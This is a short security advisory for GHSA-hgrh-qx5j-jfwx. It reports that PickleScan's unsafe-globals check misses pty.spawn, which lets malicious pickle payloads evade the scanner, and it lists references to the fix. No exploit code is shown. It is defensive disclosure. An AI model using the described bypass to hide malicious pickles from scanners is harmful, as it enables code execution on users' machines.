GHSA-hgrh-qx5j-jfwx: Picklescan Bypasses Unsafe Globals Check using pty.spawn
The vulnerability allows malicious actors to bypass PickleScan’s unsafe globals check, leading to potential arbitrary code execution. The issue stems from the absence of the pty library (more specifically, of the pty.spawn function) from PickleScan’s list of unsafe globals. This vulnerability allows attackers to disguise malicious pickle payloads within files that would otherwise be scanned for pickle-based threats.
References
- github.com/advisories/GHSA-hgrh-qx5j-jfwx
- github.com/mmaitre314/picklescan
- github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab
- github.com/mmaitre314/picklescan/pull/53
- github.com/mmaitre314/picklescan/releases/tag/v0.0.33
- github.com/mmaitre314/picklescan/security/advisories/GHSA-hgrh-qx5j-jfwx
Code Behaviors & Features
Detect and mitigate GHSA-hgrh-qx5j-jfwx with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →